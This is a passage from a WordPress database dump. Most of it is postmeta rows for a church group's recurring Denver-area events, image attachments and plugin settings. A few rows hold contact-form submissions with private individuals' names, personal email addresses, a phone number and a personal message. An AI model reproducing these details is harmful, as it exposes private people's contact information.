09:00:00'),(122259,263249,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2021-11-07\";s:14:\"EventStartDate\";s:19:\"2020-11-01 12:00:00\";s:12:\"EventEndDate\";s:19:\"2020-11-01 13:30:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(122256,263249,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122246,263249,'_EventStartDate','2021-04-04 12:00:00'),(122247,263249,'_EventStartDateUTC','2021-04-04 18:00:00'),(122248,263249,'_EventEndDate','2021-04-04 13:30:00'),(122249,263249,'_EventEndDateUTC','2021-04-04 19:30:00'),(122250,263249,'_EventDuration','5400'),(122251,263249,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122253,263249,'_EventOrigin','events-calendar'),(122254,263249,'_EventOrigin','events-calendar'),(122255,263249,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628578;s:24:\"boldgrid_hide_page_title\";i:1610628578;s:16:\"_EventRecurrence\";i:1610628578;s:17:\"_EventShowMapLink\";i:1610628578;s:13:\"_EventShowMap\";i:1610628578;s:20:\"_EventCurrencySymbol\";i:1610628578;s:22:\"_EventCurrencyPosition\";i:1610628578;s:10:\"_EventCost\";i:1610628578;s:9:\"_EventURL\";i:1610628578;s:14:\"_EventTimezone\";i:1610628578;s:12:\"_dp_original\";i:1610628578;s:16:\"protect_children\";i:1610628578;s:26:\"_RTECregistrationsDisabled\";i:1610628578;s:17:\"_RTECdeadlineType\";i:1610628578;s:19:\"_RTECwhoCanRegister\";i:1610628578;s:23:\"_RTEClimitRegistrations\";i:1610628578;s:21:\"_RTECmaxRegistrations\";i:1610628578;s:13:\"_EventVenueID\";i:1610628578;s:13:\"_thumbnail_id\";i:1610628578;s:12:\"_wp_old_slug\";i:1610628578;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628578;s:16:\"tribe_events_cat\";i:1610653778;}'),(122265,263249,'_EventURL',''),(122266,263249,'_EventTimezone','America/Denver'),(122267,263249,'_dp_original','201534'),(122268,263249,'protect_children',''),(122269,263249,'_RTECregistrationsDisabled','1'),(120894,263177,'_EventTimezone','America/Denver'),(114444,262789,'_EventURL',''),(114445,262789,'_EventTimezone','America/Denver'),(114446,262789,'_EventTimezoneAbbr','MST'),(120867,263177,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1609513573;s:12:\"_EventOrigin\";i:1609513573;s:13:\"_thumbnail_id\";i:1609513848;s:24:\"boldgrid_hide_page_title\";i:1609513573;s:17:\"_EventShowMapLink\";i:1609513573;s:13:\"_EventShowMap\";i:1609513573;s:15:\"_EventStartDate\";i:1609513848;s:13:\"_EventEndDate\";i:1609513848;s:18:\"_EventStartDateUTC\";i:1609513848;s:16:\"_EventEndDateUTC\";i:1609513848;s:14:\"_EventDuration\";i:1609513573;s:20:\"_EventCurrencySymbol\";i:1609513573;s:22:\"_EventCurrencyPosition\";i:1609513573;s:10:\"_EventCost\";i:1609513573;s:9:\"_EventURL\";i:1609513573;s:14:\"_EventTimezone\";i:1609513573;s:18:\"_EventTimezoneAbbr\";i:1609513573;s:27:\"_EventNextPendingRecurrence\";i:1609513573;s:26:\"_RTECregistrationsDisabled\";i:1609513573;s:17:\"_RTECdeadlineType\";i:1609513573;s:19:\"_RTECwhoCanRegister\";i:1609513573;s:23:\"_RTEClimitRegistrations\";i:1609513573;s:21:\"_RTECmaxRegistrations\";i:1609513573;s:16:\"_EventRecurrence\";i:1609513573;s:18:\"_RTECnumRegistered\";i:1609513573;s:13:\"_EventVenueID\";i:1609513573;s:12:\"_dp_original\";i:1609513573;s:16:\"tribe_events_cat\";i:1609540873;s:10:\"_edit_last\";i:1609513648;s:10:\"post_title\";i:1609513648;s:12:\"post_content\";i:1609515673;s:11:\"post_status\";i:1609513848;}'),(114443,262789,'_EventCost',''),(128904,263459,'_EventTimezoneAbbr','MST'),(115660,262791,'_EventShowMap','1'),(114442,262789,'_EventCurrencyPosition','prefix'),(125413,263327,'_RTECregistrationsDisabled','1'),(125441,263328,'_RTEClimitRegistrations','0'),(125355,263325,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610630420;s:12:\"_EventOrigin\";i:1610630420;s:13:\"_thumbnail_id\";i:1610630420;s:26:\"_RTECregistrationsDisabled\";i:1610630420;s:17:\"_RTECdeadlineType\";i:1610630420;s:19:\"_RTECwhoCanRegister\";i:1610630420;s:23:\"_RTEClimitRegistrations\";i:1610630420;s:21:\"_RTECmaxRegistrations\";i:1610630420;s:24:\"boldgrid_hide_page_title\";i:1610630420;s:16:\"_EventRecurrence\";i:1610630420;s:17:\"_EventShowMapLink\";i:1610630420;s:13:\"_EventShowMap\";i:1610630420;s:13:\"_EventVenueID\";i:1610630420;s:20:\"_EventCurrencySymbol\";i:1610630420;s:22:\"_EventCurrencyPosition\";i:1610630420;s:10:\"_EventCost\";i:1610630420;s:9:\"_EventURL\";i:1610630420;s:14:\"_EventTimezone\";i:1610630420;s:12:\"_dp_original\";i:1610630420;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610630420;s:16:\"tribe_events_cat\";i:1610655620;}'),(124679,263325,'_EventEndDateUTC','2021-02-09 03:30:00'),(124680,263325,'_EventDuration','5400'),(124940,263333,'_EventStartDate','2021-10-11 19:00:00'),(128867,263459,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1611754998;s:12:\"_EventOrigin\";i:1611754998;s:13:\"_thumbnail_id\";i:1611755387;s:24:\"boldgrid_hide_page_title\";i:1611754998;s:17:\"_EventShowMapLink\";i:1611754998;s:13:\"_EventShowMap\";i:1611754998;s:15:\"_EventStartDate\";i:1611755387;s:13:\"_EventEndDate\";i:1611755387;s:18:\"_EventStartDateUTC\";i:1611755387;s:16:\"_EventEndDateUTC\";i:1611755387;s:14:\"_EventDuration\";i:1611755387;s:20:\"_EventCurrencySymbol\";i:1611754998;s:22:\"_EventCurrencyPosition\";i:1611754998;s:10:\"_EventCost\";i:1611754998;s:9:\"_EventURL\";i:1611754998;s:14:\"_EventTimezone\";i:1611754998;s:18:\"_EventTimezoneAbbr\";i:1611754998;s:27:\"_EventNextPendingRecurrence\";i:1611754998;s:26:\"_RTECregistrationsDisabled\";i:1611754998;s:17:\"_RTECdeadlineType\";i:1611754998;s:19:\"_RTECwhoCanRegister\";i:1611754998;s:23:\"_RTEClimitRegistrations\";i:1611754998;s:21:\"_RTECmaxRegistrations\";i:1611754998;s:16:\"_EventRecurrence\";i:1611754998;s:18:\"_RTECnumRegistered\";i:1611754999;s:13:\"_EventVenueID\";i:1611754999;s:12:\"_dp_original\";i:1611754999;s:16:\"tribe_events_cat\";i:1611781382;s:10:\"_edit_last\";i:1611755021;s:12:\"post_content\";i:1611756114;s:10:\"post_title\";i:1611755097;s:11:\"post_status\";i:1611755387;}'),(122514,263256,'_EventCurrencySymbol',''),(122515,263256,'_EventCurrencyPosition','prefix'),(122516,263256,'_EventCost',''),(122517,263256,'_EventURL',''),(122518,263256,'_EventTimezone','America/Denver'),(122519,263256,'_dp_original','201534'),(122509,263256,'_tribe_modified_fields','a:22:{s:12:\"_EventOrigin\";i:1610628580;s:24:\"boldgrid_hide_page_title\";i:1610628580;s:16:\"_EventRecurrence\";i:1610628580;s:17:\"_EventShowMapLink\";i:1610628580;s:13:\"_EventShowMap\";i:1610628580;s:20:\"_EventCurrencySymbol\";i:1610628580;s:22:\"_EventCurrencyPosition\";i:1610628580;s:10:\"_EventCost\";i:1610628580;s:9:\"_EventURL\";i:1610628580;s:14:\"_EventTimezone\";i:1610628580;s:12:\"_dp_original\";i:1610628580;s:16:\"protect_children\";i:1610628580;s:26:\"_RTECregistrationsDisabled\";i:1610628580;s:17:\"_RTECdeadlineType\";i:1610628580;s:19:\"_RTECwhoCanRegister\";i:1610628580;s:23:\"_RTEClimitRegistrations\";i:1610628580;s:21:\"_RTECmaxRegistrations\";i:1610628580;s:13:\"_EventVenueID\";i:1610628580;s:13:\"_thumbnail_id\";i:1610628580;s:12:\"_wp_old_slug\";i:1610628580;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610628580;s:16:\"tribe_events_cat\";i:1610653780;}'),(122512,263256,'_EventShowMapLink','1'),(122513,263256,'_EventShowMap','1'),(121693,263232,'_EventDuration','5400'),(124547,263319,'_EventRecurrence','a:3:{s:5:\"rules\";a:0:{}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(121694,263232,'_EventCurrencySymbol',''),(121695,263232,'_EventCurrencyPosition','prefix'),(121696,263232,'_EventCost',''),(128901,263459,'_EventCost',''),(121697,263232,'_EventURL',''),(121698,263232,'_EventTimezone','America/Denver'),(124532,263319,'_RTECmaxRegistrations','30'),(124533,263319,'boldgrid_hide_page_title','0'),(121699,263232,'_EventTimezoneAbbr','MST'),(124531,263319,'_RTEClimitRegistrations','0'),(121711,263232,'_dp_original','225018'),(124530,263319,'_RTECwhoCanRegister','any'),(124557,263319,'_EventCurrencyPosition','prefix'),(104031,262433,'_EventNextPendingRecurrence','2022-02-20 22:30:00'),(104009,262433,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1606990753;s:12:\"_EventOrigin\";i:1606990753;s:13:\"_thumbnail_id\";i:1606990753;s:24:\"boldgrid_hide_page_title\";i:1606990753;s:17:\"_EventShowMapLink\";i:1606990753;s:13:\"_EventShowMap\";i:1606990753;s:15:\"_EventStartDate\";i:1607030855;s:13:\"_EventEndDate\";i:1607031045;s:18:\"_EventStartDateUTC\";i:1607030855;s:16:\"_EventEndDateUTC\";i:1607031045;s:14:\"_EventDuration\";i:1607031045;s:20:\"_EventCurrencySymbol\";i:1606990753;s:22:\"_EventCurrencyPosition\";i:1606990753;s:10:\"_EventCost\";i:1606990753;s:9:\"_EventURL\";i:1606990753;s:14:\"_EventTimezone\";i:1606990753;s:18:\"_EventTimezoneAbbr\";i:1606990753;s:27:\"_EventNextPendingRecurrence\";i:1606990753;s:26:\"_RTECregistrationsDisabled\";i:1606990753;s:17:\"_RTECdeadlineType\";i:1606990753;s:19:\"_RTECwhoCanRegister\";i:1606990753;s:23:\"_RTEClimitRegistrations\";i:1606990753;s:21:\"_RTECmaxRegistrations\";i:1606990753;s:16:\"_EventRecurrence\";i:1606990753;s:18:\"_RTECnumRegistered\";i:1606990753;s:13:\"_EventVenueID\";i:1606991943;s:12:\"_dp_original\";i:1606990753;s:16:\"tribe_events_cat\";i:1609185800;s:10:\"_edit_last\";i:1606990827;s:10:\"post_title\";i:1606990827;s:12:\"post_content\";i:1607074144;s:11:\"post_status\";i:1606990868;}'),(104017,262433,'boldgrid_hide_page_title','0'),(104026,262433,'_EventCurrencyPosition','prefix'),(104027,262433,'_EventCost',''),(104028,262433,'_EventURL',''),(104029,262433,'_EventTimezone','America/Denver'),(104011,262433,'_EventOrigin','events-calendar'),(104010,262433,'_EventOrigin','events-calendar'),(104077,262433,'_EventVenueID','262435'),(104041,262433,'_dp_original','262422'),(104042,262433,'_edit_lock','1609185800:2'),(104043,262433,'_edit_last','2'),(104038,262433,'_RTECnumRegistered','0'),(104012,262433,'_EventOrigin','events-calendar'),(104013,262433,'_EventOrigin','events-calendar'),(104014,262433,'_EventOrigin','events-calendar'),(104015,262433,'_EventOrigin','events-calendar'),(104016,262433,'_thumbnail_id','262424'),(104030,262433,'_EventTimezoneAbbr','MST'),(94324,261776,'_field_212','Lana'),(94325,261776,'_field_213','Bowers'),(94326,261776,'_field_214','lanakoa14@gmail.com'),(94327,261776,'_field_215','(808) 282-0761'),(94328,261776,'_field_216','Denver'),(94329,261776,'_field_219','ESA/Initiator-Kimberly Young'),(94330,261776,'_field_220','Hello, \n\nWould you have time to do an initiation for me on a weekend in September? I received an initiation letter about a month ago. Please let me know if you will have time. \nTHANK YOU! \n\nLana'),(94331,261776,'_form_id','20'),(94332,261776,'_seq_num','2'),(192823,269146,'mec_end_time_minutes','0'),(192822,269146,'mec_end_time_hour','5'),(192821,269146,'mec_end_date','2023-10-06'),(192820,269146,'mec_start_day_seconds','36000'),(192819,269146,'mec_start_time_ampm','AM'),(96597,262231,'_wp_attached_file','2020/10/loveland-center-10-21-2020.jpg'),(96598,262231,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:725;s:6:\"height\";i:342;s:4:\"file\";s:38:\"2020/10/loveland-center-10-21-2020.jpg\";s:5:\"sizes\";a:3:{s:6:\"medium\";a:4:{s:4:\"file\";s:38:\"loveland-center-10-21-2020-300x142.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:142;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:38:\"loveland-center-10-21-2020-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:38:\"loveland-center-10-21-2020-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:3:\"4.5\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:6:\"C725UZ\";s:7:\"caption\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:17:\"created_timestamp\";s:12:\"-62169984000\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:3:\"6.4\";s:3:\"iso\";s:3:\"100\";s:13:\"shutter_speed\";s:5:\"0.005\";s:5:\"title\";s:22:\"OLYMPUS DIGITAL CAMERA\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(96599,262236,'_field_224','Diane'),(96600,262236,'_field_225','Haddenham'),(96601,262236,'_field_226','264haddenh@gmail.com'),(96602,262236,'_field_227','WA'),(96603,262236,'_field_228','US'),(96604,262236,'_field_229','a:3:{i:0;s:16:\"Colorado Springs\";i:1;s:39:\"Central Colorado/ECK Temple in Colorado\";i:2;s:8:\"Loveland\";}'),(96605,262236,'_form_id','21'),(96606,262236,'_seq_num','111'),(96694,262256,'_wp_attached_file','2020/10/hero-stitched-2.jpg'),(96695,262256,'_wp_attachment_metadata','a:5:{s:5:\"width\";i:1920;s:6:\"height\";i:1368;s:4:\"file\";s:27:\"2020/10/hero-stitched-2.jpg\";s:5:\"sizes\";a:6:{s:6:\"medium\";a:4:{s:4:\"file\";s:27:\"hero-stitched-2-300x214.jpg\";s:5:\"width\";i:300;s:6:\"height\";i:214;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:5:\"large\";a:4:{s:4:\"file\";s:28:\"hero-stitched-2-1024x730.jpg\";s:5:\"width\";i:1024;s:6:\"height\";i:730;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"thumbnail\";a:4:{s:4:\"file\";s:27:\"hero-stitched-2-150x150.jpg\";s:5:\"width\";i:150;s:6:\"height\";i:150;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:12:\"medium_large\";a:4:{s:4:\"file\";s:27:\"hero-stitched-2-768x547.jpg\";s:5:\"width\";i:768;s:6:\"height\";i:547;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:9:\"1536x1536\";a:4:{s:4:\"file\";s:29:\"hero-stitched-2-1536x1094.jpg\";s:5:\"width\";i:1536;s:6:\"height\";i:1094;s:9:\"mime-type\";s:10:\"image/jpeg\";}s:20:\"gg_gallery_thumbnail\";a:4:{s:4:\"file\";s:27:\"hero-stitched-2-450x250.jpg\";s:5:\"width\";i:450;s:6:\"height\";i:250;s:9:\"mime-type\";s:10:\"image/jpeg\";}}s:10:\"image_meta\";a:12:{s:8:\"aperture\";s:1:\"0\";s:6:\"credit\";s:0:\"\";s:6:\"camera\";s:0:\"\";s:7:\"caption\";s:0:\"\";s:17:\"created_timestamp\";s:1:\"0\";s:9:\"copyright\";s:0:\"\";s:12:\"focal_length\";s:1:\"0\";s:3:\"iso\";s:1:\"0\";s:13:\"shutter_speed\";s:1:\"0\";s:5:\"title\";s:0:\"\";s:11:\"orientation\";s:1:\"0\";s:8:\"keywords\";a:0:{}}}'),(96696,262256,'_edit_lock','1603643414:2'),(96697,262256,'original-file','2020/10/hero-stitched-2-updraft-pre-smush-original.jpg'),(96698,262256,'smush-complete','1'),(96699,262256,'smush-info','The file was compressed from 843.42 KB to 795.91 KB saving 5.63 percent using WP-Optimize'),(96700,262256,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:863658;s:12:\"smushed-size\";i:815016;s:15:\"savings-percent\";d:5.62999999999999989341858963598497211933135986328125;}'),(96701,262251,'original-file','2020/10/eck-on-vimeo-1-updraft-pre-smush-original.png'),(96702,262251,'smush-complete','1'),(96703,262251,'smush-info','The file was compressed from 71.14 KB to 21.56 KB saving 69.7 percent using WP-Optimize'),(96704,262251,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:72850;s:12:\"smushed-size\";i:22075;s:15:\"savings-percent\";d:69.7000000000000028421709430404007434844970703125;}'),(96705,262231,'original-file','2020/10/loveland-center-10-21-2020-updraft-pre-smush-original.jpg'),(96706,262231,'smush-complete','1'),(96707,262231,'smush-info','The file was compressed from 73.31 KB to 63.26 KB saving 13.7 percent using WP-Optimize'),(96708,262231,'smush-stats','a:4:{s:12:\"smushed-with\";s:11:\"re-smush-it\";s:13:\"original-size\";i:75069;s:12:\"smushed-size\";i:64781;s:15:\"savings-percent\";d:13.699999999999999289457264239899814128875732421875;}'),(104110,262441,'_tribe_modified_fields','a:32:{s:16:\"protect_children\";i:1607071445;s:12:\"_EventOrigin\";i:1607071445;s:13:\"_thumbnail_id\";i:1607071861;s:24:\"boldgrid_hide_page_title\";i:1607071445;s:17:\"_EventShowMapLink\";i:1607071445;s:13:\"_EventShowMap\";i:1607071445;s:15:\"_EventStartDate\";i:1607071861;s:13:\"_EventEndDate\";i:1607071861;s:18:\"_EventStartDateUTC\";i:1607071861;s:16:\"_EventEndDateUTC\";i:1607071861;s:14:\"_EventDuration\";i:1607071861;s:20:\"_EventCurrencySymbol\";i:1607071445;s:22:\"_EventCurrencyPosition\";i:1607071445;s:10:\"_EventCost\";i:1607071445;s:9:\"_EventURL\";i:1607071445;s:14:\"_EventTimezone\";i:1607071445;s:18:\"_EventTimezoneAbbr\";i:1607071445;s:27:\"_EventNextPendingRecurrence\";i:1607071445;s:26:\"_RTECregistrationsDisabled\";i:1607071445;s:17:\"_RTECdeadlineType\";i:1607071445;s:19:\"_RTECwhoCanRegister\";i:1607071445;s:23:\"_RTEClimitRegistrations\";i:1607071445;s:21:\"_RTECmaxRegistrations\";i:1607071445;s:16:\"_EventRecurrence\";i:1607071445;s:18:\"_RTECnumRegistered\";i:1607071445;s:12:\"_dp_original\";i:1607071445;s:13:\"_EventVenueID\";i:1607071445;s:16:\"tribe_events_cat\";i:1609185788;s:10:\"_edit_last\";i:1607071468;s:12:\"post_content\";i:1607072314;s:10:\"post_title\";i:1607071652;s:11:\"post_status\";i:1607071861;}'),(97250,262297,'_field_133','Jeff'),(97251,262297,'_field_134','Custer'),(97252,262297,'_field_135','jcuster2805@gmail.com'),(97253,262297,'_field_137','Email Change'),(97254,262297,'_field_138','Please change my email address - thanks!'),(97255,262297,'_form_id','13'),(97256,262297,'_seq_num','60'),(97377,262305,'_VenueURL',''),(126344,263374,'_EventStartDate','2021-09-05 10:30:00'),(126345,263374,'_EventStartDateUTC','2021-09-05 16:30:00'),(126346,263374,'_EventEndDate','2021-09-05 12:00:00'),(126347,263374,'_EventEndDateUTC','2021-09-05 18:00:00'),(126348,263374,'_EventDuration','5400'),(128624,263374,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128630,263374,'_EventOrigin','events-calendar'),(128632,263374,'_RTECregistrationsDisabled','1'),(128633,263374,'_RTECdeadlineType','start'),(128634,263374,'_RTECwhoCanRegister','any'),(128628,263374,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128629,263374,'_EventOrigin','events-calendar'),(128635,263374,'_RTEClimitRegistrations','0'),(128636,263374,'_RTECmaxRegistrations','30'),(128637,263374,'boldgrid_hide_page_title','0'),(128638,263374,'_EventRecurrence','a:3:{s:5:\"rules\";a:1:{i:0;a:6:{s:4:\"type\";s:6:\"Custom\";s:6:\"custom\";a:4:{s:8:\"interval\";s:1:\"1\";s:5:\"month\";a:3:{s:8:\"same-day\";s:2:\"no\";s:6:\"number\";s:5:\"First\";s:3:\"day\";s:1:\"7\";}s:9:\"same-time\";s:3:\"yes\";s:4:\"type\";s:7:\"Monthly\";}s:8:\"end-type\";s:2:\"On\";s:3:\"end\";s:10:\"2022-02-06\";s:14:\"EventStartDate\";s:19:\"2021-03-07 10:30:00\";s:12:\"EventEndDate\";s:19:\"2021-03-07 12:00:00\";}}s:10:\"exclusions\";a:0:{}s:11:\"description\";N;}'),(128639,263374,'_EventShowMapLink','1'),(128640,263374,'_EventShowMap','1'),(128641,263374,'_EventVenueID','262305'),(128642,263374,'_EventCurrencySymbol',''),(128643,263374,'_EventCurrencyPosition','prefix'),(128644,263374,'_EventCost',''),(128645,263374,'_EventURL',''),(128646,263374,'_EventTimezone','America/Denver'),(128647,263374,'_dp_original','263362'),(128648,263374,'_TribeEventsPRO_RecurrenceQueue','a:5:{s:6:\"create\";a:0:{}s:6:\"update\";a:11:{i:263369;a:2:{s:9:\"timestamp\";i:1617532200;s:8:\"duration\";i:5400;}i:263370;a:2:{s:9:\"timestamp\";i:1619951400;s:8:\"duration\";i:5400;}i:263371;a:2:{s:9:\"timestamp\";i:1622975400;s:8:\"duration\";i:5400;}i:263372;a:2:{s:9:\"timestamp\";i:1625394600;s:8:\"duration\";i:5400;}i:263373;a:2:{s:9:\"timestamp\";i:1627813800;s:8:\"duration\";i:5400;}i:263374;a:2:{s:9:\"timestamp\";i:1630837800;s:8:\"duration\";i:5400;}i:263375;a:2:{s:9:\"timestamp\";i:1633257000;s:8:\"duration\";i:5400;}i:263376;a:2:{s:9:\"timestamp\";i:1636281000;s:8:\"duration\";i:5400;}i:263377;a:2:{s:9:\"timestamp\";i:1638700200;s:8:\"duration\";i:5400;}i:263378;a:2:{s:9:\"timestamp\";i:1641119400;s:8:\"duration\";i:5400;}i:263379;a:2:{s:9:\"timestamp\";i:1644143400;s:8:\"duration\";i:5400;}}s:6:\"delete\";a:0:{}s:7:\"exclude\";a:0:{}s:8:\"original\";i:11;}'),(126377,263375,'_EventStartDate','2021-10-03 10:30:00'),(126378,263375,'_EventStartDateUTC','2021-10-03 16:30:00'),(126379,263375,'_EventEndDate','2021-10-03 12:00:00'),(126380,263375,'_EventEndDateUTC','2021-10-03 18:00:00'),(126381,263375,'_EventDuration','5400'),(128649,263375,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128655,263375,'_EventOrigin','events-calendar'),(128657,263375,'_RTECregistrationsDisabled','1'),(128658,263375,'_RTECdeadlineType','start'),(128659,263375,'_RTECwhoCanRegister','any'),(128653,263375,'_tribe_modified_fields','a:21:{s:16:\"protect_children\";i:1610635271;s:12:\"_EventOrigin\";i:1610635271;s:13:\"_thumbnail_id\";i:1610635271;s:26:\"_RTECregistrationsDisabled\";i:1610635271;s:17:\"_RTECdeadlineType\";i:1610635271;s:19:\"_RTECwhoCanRegister\";i:1610635271;s:23:\"_RTEClimitRegistrations\";i:1610635271;s:21:\"_RTECmaxRegistrations\";i:1610635271;s:24:\"boldgrid_hide_page_title\";i:1610635271;s:16:\"_EventRecurrence\";i:1610635271;s:17:\"_EventShowMapLink\";i:1610635271;s:13:\"_EventShowMap\";i:1610635271;s:13:\"_EventVenueID\";i:1610635271;s:20:\"_EventCurrencySymbol\";i:1610635271;s:22:\"_EventCurrencyPosition\";i:1610635271;s:10:\"_EventCost\";i:1610635271;s:9:\"_EventURL\";i:1610635271;s:14:\"_EventTimezone\";i:1610635271;s:12:\"_dp_original\";i:1610635271;s:31:\"_TribeEventsPRO_RecurrenceQueue\";i:1610635271;s:16:\"tribe_events_cat\";i:1610660471;}'),(128654,263375,'_EventOrigin','events-calendar'),(128660,263375,'_RTEClimitRegistrations','0'),(128661,263375,'_RTECmaxRegistrations','30'),(128662,263375,'boldgrid_hide_page_title','0'),(128663,263375,'_EventRecurrence','a:3:{s:5